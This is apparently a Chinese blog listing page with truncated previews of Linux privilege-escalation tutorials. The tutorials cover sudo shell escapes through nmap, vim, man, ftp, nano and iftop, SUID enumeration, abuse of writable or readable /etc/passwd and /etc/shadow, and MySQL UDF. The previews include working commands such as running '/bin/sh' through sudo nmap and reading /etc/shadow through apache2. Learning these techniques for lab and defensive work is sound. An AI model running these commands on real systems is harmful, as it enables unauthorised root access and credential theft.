-
sudo提权 - apache2
在没有 shell 转义序列的情况下,可以使用sudo来操作apache2进行提权: sudo apache2 -f /etc/shadow john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt- 20
- 0
-
-
sudo提权 - nmap
nmap是网络扫描和嗅探工具包 #nmap的sudo提权命令(禁用输入回显) TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF #nmap的sudo提权命令(利用nmap版本2.02至5.21的交互模式) sudo nmap --interactive nmap…- 4
- 0
-
sudo提权 - ftp
FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。 sudo提权 - ftp sudo ftp !/bin/sh- 0
- 0
-
-
-
sudo提权 - man
man 命令是 Linux 下的帮助指令,通过 man 指令可以查看 Linux 中的指令帮助、配置文件帮助和编程帮助等信息。 sudo man man !/bin/sh- 2
- 0
-
sudo提权 - vim
vim是目前我们使用比较多的是 vim 编辑器。 ,vim内设的各种功能是vim具有非常强大的编辑能力,让我们快速的完成各种编辑任务。 #方法一:输入sudo vim,然后在vim编辑器界面按下Shift键加" : "键,接着输入"!sh",按下回车即可 sudo vim :!sh #用:!bash也可以 whoami #方法二:输入以下命令,执行即可 su…- 0
- 0
-
sudo提权 - nano
nano 是一个字符终端的文本编辑器,是Pico的复制品;它比vi/vim要简单得多,比较适合Linux 初学者使用,某些Linux发行版的默认编辑器就是nano。 sudo nano ctrl+r ctrl+x 看到这个界面 就可以执行命令了- 1
- 0
-
sudo提权 - find
find 命令用于在指定目录下查找文件和目录。 提权利用 收集具有SUID权限的文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; /表示从文件系统的顶部(根)开…- 1
- 0
-
sudo提权 - iftop
iftop 是一个用于实时监视网络流量的工具。 shift+1也就是!感叹号可以执行命令。 命令输入: sudo iftop 然后可以看到一个流量监控的界面 然后按下 Shift+1 感叹号! 可以调出命令行 接下来输入 ! /bin/sh 直接提权- 0
- 0
-
弱文件权限 - 可写 /etc/passwd 提权
/etc/passwd 文件包含用户账户信息。它是可读的,但通常只有 root 用户才能写入。历史上,/etc/passwd 文件包含用户密码哈希值,一些 Linux 版本仍允许在其中存储密码哈希值。 请注意,/etc/passwd 文件是可写的: ls -l /etc/passwd 运行结果: user@debian:~$ ls -l /etc/passwd -rw-r--rw- 1 root …- 0
- 0
-
弱文件权限 - 可写 /etc/shadow 提权
/etc/shadow 文件包含用户密码哈希值,通常只有 root 用户才能读取该文件。 请注意,虚拟机上的 /etc/shadow 文件是可写的: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ …- 1
- 0
-
弱文件权限 - 可读 /etc/shadow 提权
/etc/shadow文件包含用户密码哈希,通常只有root用户才能读取。 请注意,环境里的/etc/shadow文件可由全部用户读取: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ 查看/e…- 0
- 0
-
mysql UDF提权
拿到普通user权限,sudo一下,再看下进程 user@debian:~$ ps -aux | grep sql Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html root 1906 0.0 0.1 9180 1396 ? S 00:56 0:00 /bin/sh /u…- 1
- 0
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×